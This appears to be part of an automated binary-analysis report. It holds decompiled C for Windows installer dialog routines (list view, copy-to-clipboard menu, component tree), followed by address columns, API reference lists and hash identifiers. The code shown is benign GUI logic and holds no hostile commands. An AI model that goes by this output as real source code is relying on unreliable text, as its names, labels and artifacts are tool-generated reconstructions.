                                                                                              							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                                                              							__eflags = _t87 - _t149;
                                                                                              							_a8 = _t87;
                                                                                              							if(_t87 <= _t149) {
                                                                                              								L37:
                                                                                              								return 0;
                                                                                              							}
                                                                                              							_t160 = CreatePopupMenu();
                                                                                              							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                                                              							_t92 = _a16;
                                                                                              							__eflags = _t92 - 0xffffffff;
                                                                                              							if(_t92 != 0xffffffff) {
                                                                                              								_t150 = _t92;
                                                                                              								_t93 = _t92 >> 0x10;
                                                                                              								__eflags = _t93;
                                                                                              								_t94 = _t93;
                                                                                              							} else {
                                                                                              								GetWindowRect(_t154,  &_v28);
                                                                                              								_t150 = _v28.left;
                                                                                              								_t94 = _v28.top;
                                                                                              							}
                                                                                              							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                                                              							_t162 = 1;
                                                                                              							__eflags = _t95 - 1;
                                                                                              							if(_t95 == 1) {
                                                                                              								_v60 = _t149;
                                                                                              								_v48 = 0x429fd8;
                                                                                              								_v44 = 0xfff;
                                                                                              								_a4 = _a8;
                                                                                              								do {
                                                                                              									_a4 = _a4 - 1;
                                                                                              									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                                                                              									__eflags = _a4 - _t149;
                                                                                              									_t162 = _t162 + _t98 + 2;
                                                                                              								} while (_a4 != _t149);
                                                                                              								OpenClipboard(_t149);
                                                                                              								EmptyClipboard();
                                                                                              								_t101 = GlobalAlloc(0x42, _t162);
                                                                                              								_a4 = _t101;
                                                                                              								_t163 = GlobalLock(_t101);
                                                                                              								do {
                                                                                              									_v48 = _t163;
                                                                                              									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                                                              									 *_t164 = 0xa0d;
                                                                                              									_t163 = _t164 + 2;
                                                                                              									_t149 = _t149 + 1;
                                                                                              									__eflags = _t149 - _a8;
                                                                                              								} while (_t149 < _a8);
                                                                                              								GlobalUnlock(_a4);
                                                                                              								SetClipboardData(1, _a4);
                                                                                              								CloseClipboard();
                                                                                              							}
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						__eflags =  *0x42e32c - _t149; // 0x0
                                                                                              						if(__eflags == 0) {
                                                                                              							ShowWindow( *0x42eb68, 8);
                                                                                              							__eflags =  *0x42ebec - _t149; // 0x0
                                                                                              							if(__eflags == 0) {
                                                                                              								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
                                                                                              							}
                                                                                              							E00403CB6(1);
                                                                                              							goto L25;
                                                                                              						}
                                                                                              						 *0x4293a0 = 2;
                                                                                              						E00403CB6(0x78);
                                                                                              						goto L20;
                                                                                              					} else {
                                                                                              						__eflags = _a12 - 0x403;
                                                                                              						if(_a12 != 0x403) {
                                                                                              							L20:
                                                                                              							return E00403D44(_a8, _a12, _a16);
                                                                                              						}
                                                                                              						ShowWindow( *0x42e330, _t149);
                                                                                              						ShowWindow(_t154, 8);
                                                                                              						E00403D12(_t154);
                                                                                              						goto L17;
                                                                                              					}
                                                                                              				}
                                                                                              				_v52 = _v52 | 0xffffffff;
                                                                                              				_v40 = _v40 | 0xffffffff;
                                                                                              				_v60 = 2;
                                                                                              				_v56 = 0;
                                                                                              				_v48 = 0;
                                                                                              				_v44 = 0;
                                                                                              				asm("stosd");
                                                                                              				asm("stosd");
                                                                                              				_t123 =  *0x42eb70; // 0x654160
                                                                                              				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                                              				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                                              				 *0x42e330 = GetDlgItem(_a4, 0x403);
                                                                                              				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
                                                                                              				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                                              				 *0x42e344 = _t127;
                                                                                              				_v8 = _t127;
                                                                                              				E00403D12( *0x42e330);
                                                                                              				 *0x42e334 = E0040456B(4);
                                                                                              				 *0x42e34c = 0;
                                                                                              				GetClientRect(_v8,  &_v28);
                                                                                              				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                                                              				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                                                              				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                              				if(_a8 >= 0) {
                                                                                              					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                                              					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                                              				}
                                                                                              				if(_a12 >= _t149) {
                                                                                              					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                                                              				}
                                                                                              				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                              				_push(0x1b);
                                                                                              				E00403CDD(_a4);
                                                                                              				if(( *0x42eb78 & 0x00000003) != 0) {
                                                                                              					ShowWindow( *0x42e330, _t149);
                                                                                              					if(( *0x42eb78 & 0x00000002) != 0) {
                                                                                              						 *0x42e330 = _t149;
                                                                                              					} else {
                                                                                              						ShowWindow(_v8, 8);
                                                                                              					}
                                                                                              					E00403D12( *0x42e328);
                                                                                              				}
                                                                                              				_t158 = GetDlgItem(_a4, 0x3ec);
                                                                                              				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                                                              				if(( *0x42eb78 & 0x00000004) != 0) {
                                                                                              					SendMessageA(_t158, 0x409, _t149, _a12);
                                                                                              					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                                                              				}
                                                                                              				goto L37;
                                                                                              			}


































                                                                                              0x00404e35
                                                                                              0x00404e3c
                                                                                              0x00404e3f
                                                                                              0x00404e42
                                                                                              0x00404e45
                                                                                              0x00404e46
                                                                                              0x00404e47
                                                                                              0x00404e60
                                                                                              0x00404e63
                                                                                              0x00404e6d
                                                                                              0x00404e7c
                                                                                              0x00404e84
                                                                                              0x00404e8c
                                                                                              0x00404e91
                                                                                              0x00404e94
                                                                                              0x00404ea0
                                                                                              0x00404ea9
                                                                                              0x00404eb2
                                                                                              0x00404ed5
                                                                                              0x00404edb
                                                                                              0x00404eec
                                                                                              0x00404ef1
                                                                                              0x00404eff
                                                                                              0x00404f0d
                                                                                              0x00404f0d
                                                                                              0x00404f12
                                                                                              0x00404f20
                                                                                              0x00404f20
                                                                                              0x00404f25
                                                                                              0x00404f28
                                                                                              0x00404f2d
                                                                                              0x00404f39
                                                                                              0x00404f42
                                                                                              0x00404f4f
                                                                                              0x00404f5e
                                                                                              0x00404f51
                                                                                              0x00404f56
                                                                                              0x00404f56
                                                                                              0x00404f6a
                                                                                              0x00404f6a
                                                                                              0x00404f7e
                                                                                              0x00404f87
                                                                                              0x00404f90
                                                                                              0x00404fa0
                                                                                              0x00404fac
                                                                                              0x00404fac
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00404E66
                                                                                              • GetDlgItem.USER32 ref: 00404E75
                                                                                              • GetClientRect.USER32 ref: 00404EB2
                                                                                              • GetSystemMetrics.USER32 ref: 00404EBA
                                                                                              • SendMessageA.USER32 ref: 00404EDB
                                                                                              • SendMessageA.USER32 ref: 00404EEC
                                                                                              • SendMessageA.USER32 ref: 00404EFF
                                                                                              • SendMessageA.USER32 ref: 00404F0D
                                                                                              • SendMessageA.USER32 ref: 00404F20
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00404F56
                                                                                              • GetDlgItem.USER32 ref: 00404F77
                                                                                              • SendMessageA.USER32 ref: 00404F87
                                                                                              • SendMessageA.USER32 ref: 00404FA0
                                                                                              • SendMessageA.USER32 ref: 00404FAC
                                                                                              • GetDlgItem.USER32 ref: 00404E84
                                                                                                • Part of subcall function 00403D12: SendMessageA.USER32 ref: 00403D20
                                                                                              • GetDlgItem.USER32 ref: 00404FC9
                                                                                              • CreateThread.KERNEL32 ref: 00404FD7
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                                                                              • ShowWindow.USER32(00000000), ref: 00405002
                                                                                              • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                                                                              • ShowWindow.USER32(00000008), ref: 0040504E
                                                                                              • SendMessageA.USER32 ref: 00405080
                                                                                              • CreatePopupMenu.USER32 ref: 00405091
                                                                                              • AppendMenuA.USER32 ref: 004050A6
                                                                                              • GetWindowRect.USER32 ref: 004050B9
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                                                                              • SendMessageA.USER32 ref: 00405118
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405128
                                                                                              • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                                                                                              • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                                                                              • GlobalLock.KERNEL32 ref: 00405141
                                                                                              • SendMessageA.USER32 ref: 00405155
                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                                                                              • SetClipboardData.USER32 ref: 00405178
                                                                                              • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040517E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: `Ae${
                                                                                              • API String ID: 590372296-77332433
                                                                                              • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                                                              • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                                                                              • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                                                                              • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 98%
                                                                                              			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                                                              				struct HWND__* _v8;
                                                                                              				struct HWND__* _v12;
                                                                                              				signed int _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				void* _v24;
                                                                                              				long _v28;
                                                                                              				int _v32;
                                                                                              				signed int _v40;
                                                                                              				int _v44;
                                                                                              				signed int* _v56;
                                                                                              				intOrPtr _v60;
                                                                                              				signed int _v64;
                                                                                              				long _v68;
                                                                                              				void* _v72;
                                                                                              				intOrPtr _v76;
                                                                                              				intOrPtr _v80;
                                                                                              				void* _v84;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				struct HWND__* _t182;
                                                                                              				intOrPtr _t183;
                                                                                              				int _t189;
                                                                                              				int _t196;
                                                                                              				intOrPtr _t198;
                                                                                              				long _t202;
                                                                                              				signed int _t206;
                                                                                              				signed int _t217;
                                                                                              				void* _t220;
                                                                                              				void* _t221;
                                                                                              				int _t227;
                                                                                              				intOrPtr _t231;
                                                                                              				signed int _t232;
                                                                                              				signed int _t233;
                                                                                              				signed int _t240;
                                                                                              				signed int _t242;
                                                                                              				signed int _t245;
                                                                                              				signed int _t247;
                                                                                              				struct HBITMAP__* _t250;
                                                                                              				void* _t252;
                                                                                              				char* _t268;
                                                                                              				signed char _t269;
                                                                                              				long _t274;
                                                                                              				int _t280;
                                                                                              				signed int* _t281;
                                                                                              				int _t282;
                                                                                              				long _t283;
                                                                                              				signed int* _t284;
                                                                                              				int _t285;
                                                                                              				long _t286;
                                                                                              				signed int _t287;
                                                                                              				long _t288;
                                                                                              				signed int _t291;
                                                                                              				int _t294;
                                                                                              				signed int _t298;
                                                                                              				signed int _t300;
                                                                                              				signed int _t302;
                                                                                              				intOrPtr _t309;
                                                                                              				int* _t310;
                                                                                              				void* _t311;
                                                                                              				int _t315;
                                                                                              				int _t316;
                                                                                              				int _t317;
                                                                                              				signed int _t318;
                                                                                              				void* _t320;
                                                                                              				void* _t328;
                                                                                              				void* _t331;
                                                                                              
                                                                                              				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                              				_t182 = GetDlgItem(_a4, 0x408);
                                                                                              				_t280 =  *0x42eb88; // 0x65430c
                                                                                              				_t320 = SendMessageA;
                                                                                              				_v8 = _t182;
                                                                                              				_t183 =  *0x42eb70; // 0x654160
                                                                                              				_t315 = 0;
                                                                                              				_v32 = _t280;
                                                                                              				_v20 = _t183 + 0x94;
                                                                                              				if(_a8 != 0x110) {
                                                                                              					L23:
                                                                                              					__eflags = _a8 - 0x405;
                                                                                              					if(_a8 != 0x405) {
                                                                                              						_t289 = _a16;
                                                                                              					} else {
                                                                                              						_a12 = _t315;
                                                                                              						_t289 = 1;
                                                                                              						_a8 = 0x40f;
                                                                                              						_a16 = 1;
                                                                                              					}
                                                                                              					__eflags = _a8 - 0x4e;
                                                                                              					if(_a8 == 0x4e) {
                                                                                              						L28:
                                                                                              						__eflags = _a8 - 0x413;
                                                                                              						_v16 = _t289;
                                                                                              						if(_a8 == 0x413) {
                                                                                              							L30:
                                                                                              							__eflags =  *0x42eb79 & 0x00000002;
                                                                                              							if(( *0x42eb79 & 0x00000002) != 0) {
                                                                                              								L41:
                                                                                              								__eflags = _v16 - _t315;
                                                                                              								if(_v16 != _t315) {
                                                                                              									_t232 = _v16;
                                                                                              									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                                                                                              									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                                                              										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                                                              									}
                                                                                              									_t233 = _v16;
                                                                                              									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                                                                                              									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                                                              										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                                                                                              										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                                                              											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                                                                                              											 *_t284 =  *_t284 & 0xffffffdf;
                                                                                              											__eflags =  *_t284;
                                                                                              										} else {
                                                                                              											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              								goto L48;
                                                                                              							}
                                                                                              							__eflags = _a8 - 0x413;
                                                                                              							if(_a8 == 0x413) {
                                                                                              								L33:
                                                                                              								__eflags = _a8 - 0x413;
                                                                                              								_t289 = 0 | _a8 != 0x00000413;
                                                                                              								_t240 = E00404598(_v8, _a8 != 0x413);
                                                                                              								__eflags = _t240 - _t315;
                                                                                              								if(_t240 >= _t315) {
                                                                                              									_t93 = _t280 + 8; // 0x8
                                                                                              									_t310 = _t240 * 0x418 + _t93;
                                                                                              									_t289 =  *_t310;
                                                                                              									__eflags = _t289 & 0x00000010;
                                                                                              									if((_t289 & 0x00000010) == 0) {
                                                                                              										__eflags = _t289 & 0x00000040;
                                                                                              										if((_t289 & 0x00000040) == 0) {
                                                                                              											_t298 = _t289 ^ 0x00000001;
                                                                                              											__eflags = _t298;
                                                                                              										} else {
                                                                                              											_t300 = _t289 ^ 0x00000080;
                                                                                              											__eflags = _t300;
                                                                                              											if(_t300 >= 0) {
                                                                                              												_t298 = _t300 & 0xfffffffe;
                                                                                              											} else {
                                                                                              												_t298 = _t300 | 0x00000001;
                                                                                              											}
                                                                                              										}
                                                                                              										 *_t310 = _t298;
                                                                                              										E0040117D(_t240);
                                                                                              										_t242 =  *0x42eb78; // 0x80
                                                                                              										_t289 = 1;
                                                                                              										_a8 = 0x40f;
                                                                                              										_t245 =  !_t242 >> 0x00000008 & 1;
                                                                                              										__eflags = _t245;
                                                                                              										_a12 = 1;
                                                                                              										_a16 = _t245;
                                                                                              									}
                                                                                              								}
                                                                                              								goto L41;
                                                                                              							}
                                                                                              							_t289 = _a16;
                                                                                              							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                                                                                              							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                                                                                              								goto L41;
                                                                                              							}
                                                                                              							goto L33;
                                                                                              						}
                                                                                              						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                                                                                              						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                                                                                              							goto L48;
                                                                                              						}
                                                                                              						goto L30;
                                                                                              					} else {
                                                                                              						__eflags = _a8 - 0x413;
                                                                                              						if(_a8 != 0x413) {
                                                                                              							L48:
                                                                                              							__eflags = _a8 - 0x111;
                                                                                              							if(_a8 != 0x111) {
                                                                                              								L56:
                                                                                              								__eflags = _a8 - 0x200;
                                                                                              								if(_a8 == 0x200) {
                                                                                              									SendMessageA(_v8, 0x200, _t315, _t315);
                                                                                              								}
                                                                                              								__eflags = _a8 - 0x40b;
                                                                                              								if(_a8 == 0x40b) {
                                                                                              									_t220 =  *0x429fb4;
                                                                                              									__eflags = _t220 - _t315;
                                                                                              									if(_t220 != _t315) {
                                                                                              										ImageList_Destroy(_t220);
                                                                                              									}
                                                                                              									_t221 =  *0x429fcc;
                                                                                              									__eflags = _t221 - _t315;
                                                                                              									if(_t221 != _t315) {
                                                                                              										GlobalFree(_t221);
                                                                                              									}
                                                                                              									 *0x429fb4 = _t315;
                                                                                              									 *0x429fcc = _t315;
                                                                                              									 *0x42ebc0 = _t315;
                                                                                              								}
                                                                                              								__eflags = _a8 - 0x40f;
                                                                                              								if(_a8 != 0x40f) {
                                                                                              									L86:
                                                                                              									__eflags = _a8 - 0x420;
                                                                                              									if(_a8 == 0x420) {
                                                                                              										__eflags =  *0x42eb79 & 0x00000001;
                                                                                              										if(( *0x42eb79 & 0x00000001) != 0) {
                                                                                              											__eflags = _a16 - 0x20;
                                                                                              											_t189 = (0 | _a16 == 0x00000020) << 3;
                                                                                              											__eflags = _t189;
                                                                                              											_t316 = _t189;
                                                                                              											ShowWindow(_v8, _t316);
                                                                                              											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                                                              										}
                                                                                              									}
                                                                                              									goto L89;
                                                                                              								} else {
                                                                                              									E004011EF(_t289, _t315, _t315);
                                                                                              									__eflags = _a12 - _t315;
                                                                                              									if(_a12 != _t315) {
                                                                                              										E0040140B(8);
                                                                                              									}
                                                                                              									__eflags = _a16 - _t315;
                                                                                              									if(_a16 == _t315) {
                                                                                              										L73:
                                                                                              										E004011EF(_t289, _t315, _t315);
                                                                                              										__eflags =  *0x42eb8c - _t315; // 0x1
                                                                                              										_v32 =  *0x429fcc;
                                                                                              										_t196 =  *0x42eb88; // 0x65430c
                                                                                              										_v60 = 0xf030;
                                                                                              										_v16 = _t315;
                                                                                              										if(__eflags <= 0) {
                                                                                              											L84:
                                                                                              											InvalidateRect(_v8, _t315, 1);
                                                                                              											_t198 =  *0x42e33c; // 0x65aa00
                                                                                              											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                                                                                              											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                                                                                              												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
                                                                                              											}
                                                                                              											goto L86;
                                                                                              										} else {
                                                                                              											_t142 = _t196 + 8; // 0x654314
                                                                                              											_t281 = _t142;
                                                                                              											do {
                                                                                              												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                                                              												__eflags = _t202 - _t315;
                                                                                              												if(_t202 != _t315) {
                                                                                              													_t291 =  *_t281;
                                                                                              													_v68 = _t202;
                                                                                              													__eflags = _t291 & 0x00000001;
                                                                                              													_v72 = 8;
                                                                                              													if((_t291 & 0x00000001) != 0) {
                                                                                              														_t151 =  &(_t281[4]); // 0x654324
                                                                                              														_v72 = 9;
                                                                                              														_v56 = _t151;
                                                                                              														_t154 =  &(_t281[0]);
                                                                                              														 *_t154 = _t281[0] & 0x000000fe;
                                                                                              														__eflags =  *_t154;
                                                                                              													}
                                                                                              													__eflags = _t291 & 0x00000040;
                                                                                              													if((_t291 & 0x00000040) == 0) {
                                                                                              														_t206 = (_t291 & 0x00000001) + 1;
                                                                                              														__eflags = _t291 & 0x00000010;
                                                                                              														if((_t291 & 0x00000010) != 0) {
                                                                                              															_t206 = _t206 + 3;
                                                                                              															__eflags = _t206;
                                                                                              														}
                                                                                              													} else {
                                                                                              														_t206 = 3;
                                                                                              													}
                                                                                              													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                                                                                              													__eflags = _t294;
                                                                                              													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                                                              													SendMessageA(_v8, 0x1102, _t294, _v68);
                                                                                              													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                                                              												}
                                                                                              												_v16 = _v16 + 1;
                                                                                              												_t281 =  &(_t281[0x106]);
                                                                                              												__eflags = _v16 -  *0x42eb8c; // 0x1
                                                                                              											} while (__eflags < 0);
                                                                                              											goto L84;
                                                                                              										}
                                                                                              									} else {
                                                                                              										_t282 = E004012E2( *0x429fcc);
                                                                                              										E00401299(_t282);
                                                                                              										_t217 = 0;
                                                                                              										_t289 = 0;
                                                                                              										__eflags = _t282 - _t315;
                                                                                              										if(_t282 <= _t315) {
                                                                                              											L72:
                                                                                              											SendMessageA(_v12, 0x14e, _t289, _t315);
                                                                                              											_a16 = _t282;
                                                                                              											_a8 = 0x420;
                                                                                              											goto L73;
                                                                                              										} else {
                                                                                              											goto L69;
                                                                                              										}
                                                                                              										do {
                                                                                              											L69:
                                                                                              											_t309 = _v20;
                                                                                              											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                                                                                              											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                                                                                              												_t289 = _t289 + 1;
                                                                                              												__eflags = _t289;
                                                                                              											}
                                                                                              											_t217 = _t217 + 1;
                                                                                              											__eflags = _t217 - _t282;
                                                                                              										} while (_t217 < _t282);
                                                                                              										goto L72;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							__eflags = _a12 - 0x3f9;
                                                                                              							if(_a12 != 0x3f9) {
                                                                                              								goto L89;
                                                                                              							}
                                                                                              							__eflags = _a12 >> 0x10 - 1;
                                                                                              							if(_a12 >> 0x10 != 1) {
                                                                                              								goto L89;
                                                                                              							}
                                                                                              							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                                                              							__eflags = _t227 - 0xffffffff;
                                                                                              							if(_t227 == 0xffffffff) {
                                                                                              								goto L89;
                                                                                              							}
                                                                                              							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                                                              							__eflags = _t283 - 0xffffffff;
                                                                                              							if(_t283 == 0xffffffff) {
                                                                                              								L54:
                                                                                              								_t283 = 0x20;
                                                                                              								L55:
                                                                                              								E00401299(_t283);
                                                                                              								SendMessageA(_a4, 0x420, _t315, _t283);
                                                                                              								_a12 = 1;
                                                                                              								_a16 = _t315;
                                                                                              								_a8 = 0x40f;
                                                                                              								goto L56;
                                                                                              							}
                                                                                              							_t231 = _v20;
                                                                                              							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                                                                              							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                                                                              								goto L55;
                                                                                              							}
                                                                                              							goto L54;
                                                                                              						}
                                                                                              						goto L28;
                                                                                              					}
                                                                                              				} else {
                                                                                              					 *0x42ebc0 = _a4;
                                                                                              					_t247 =  *0x42eb8c; // 0x1
                                                                                              					_t285 = 2;
                                                                                              					_v28 = 0;
                                                                                              					_v16 = _t285;
                                                                                              					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
                                                                                              					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
                                                                                              					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
                                                                                              					_v24 = _t250;
                                                                                              					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
                                                                                              					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                              					 *0x429fb4 = _t252;
                                                                                              					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                                                              					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
                                                                                              					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                              						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                                                              					}
                                                                                              					DeleteObject(_v24);
                                                                                              					_t286 = 0;
                                                                                              					do {
                                                                                              						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                                                              						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                                                              							if(_t286 != 0x20) {
                                                                                              								_v16 = _t315;
                                                                                              							}
                                                                                              							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                                                              						}
                                                                                              						_t286 = _t286 + 1;
                                                                                              					} while (_t286 < 0x21);
                                                                                              					_t317 = _a16;
                                                                                              					_t287 = _v16;
                                                                                              					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                                                              					_push(0x15);
                                                                                              					E00403CDD(_a4);
                                                                                              					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                                                              					_push(0x16);
                                                                                              					E00403CDD(_a4);
                                                                                              					_t318 = 0;
                                                                                              					_t288 = 0;
                                                                                              					_t328 =  *0x42eb8c - _t318; // 0x1
                                                                                              					if(_t328 <= 0) {
                                                                                              						L19:
                                                                                              						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                              						goto L20;
                                                                                              					} else {
                                                                                              						_t311 = _v32 + 8;
                                                                                              						_v24 = _t311;
                                                                                              						do {
                                                                                              							_t268 = _t311 + 0x10;
                                                                                              							if( *_t268 != 0) {
                                                                                              								_v60 = _t268;
                                                                                              								_t269 =  *_t311;
                                                                                              								_t302 = 0x20;
                                                                                              								_v84 = _t288;
                                                                                              								_v80 = 0xffff0002;
                                                                                              								_v76 = 0xd;
                                                                                              								_v64 = _t302;
                                                                                              								_v40 = _t318;
                                                                                              								_v68 = _t269 & _t302;
                                                                                              								if((_t269 & 0x00000002) == 0) {
                                                                                              									__eflags = _t269 & 0x00000004;
                                                                                              									if((_t269 & 0x00000004) == 0) {
                                                                                              										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                              									} else {
                                                                                              										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                              									}
                                                                                              								} else {
                                                                                              									_v76 = 0x4d;
                                                                                              									_v44 = 1;
                                                                                              									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                              									_v28 = 1;
                                                                                              									 *( *0x429fcc + _t318 * 4) = _t274;
                                                                                              									_t288 =  *( *0x429fcc + _t318 * 4);
                                                                                              								}
                                                                                              							}
                                                                                              							_t318 = _t318 + 1;
                                                                                              							_t311 = _v24 + 0x418;
                                                                                              							_t331 = _t318 -  *0x42eb8c; // 0x1
                                                                                              							_v24 = _t311;
                                                                                              						} while (_t331 < 0);
                                                                                              						if(_v28 != 0) {
                                                                                              							L20:
                                                                                              							if(_v16 != 0) {
                                                                                              								E00403D12(_v8);
                                                                                              								_t280 = _v32;
                                                                                              								_t315 = 0;
                                                                                              								__eflags = 0;
                                                                                              								goto L23;
                                                                                              							} else {
                                                                                              								ShowWindow(_v12, 5);
                                                                                              								E00403D12(_v12);
                                                                                              								L89:
                                                                                              								return E00403D44(_a8, _a12, _a16);
                                                                                              							}
                                                                                              						}
                                                                                              						goto L19;
                                                                                              					}
                                                                                              				}
                                                                                              			}

                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004049fa
                                                                                              0x00000000
                                                                                              0x004048ba
                                                                                              0x0040466c
                                                                                              0x00404671
                                                                                              0x00404676
                                                                                              0x0040467b
                                                                                              0x0040467c
                                                                                              0x00404685
                                                                                              0x00404690
                                                                                              0x0040469b
                                                                                              0x004046a1
                                                                                              0x004046af
                                                                                              0x004046c4
                                                                                              0x004046c9
                                                                                              0x004046d4
                                                                                              0x004046dd
                                                                                              0x004046f2
                                                                                              0x00404703
                                                                                              0x00404710
                                                                                              0x00404710
                                                                                              0x00404715
                                                                                              0x0040471b
                                                                                              0x0040471d
                                                                                              0x00404720
                                                                                              0x00404725
                                                                                              0x0040472a
                                                                                              0x0040472c
                                                                                              0x0040472c
                                                                                              0x0040474c
                                                                                              0x0040474c
                                                                                              0x0040474e
                                                                                              0x0040474f
                                                                                              0x00404754
                                                                                              0x00404757
                                                                                              0x0040475a
                                                                                              0x0040475e
                                                                                              0x00404763
                                                                                              0x00404768
                                                                                              0x0040476c
                                                                                              0x00404771
                                                                                              0x00404776
                                                                                              0x00404778
                                                                                              0x0040477a
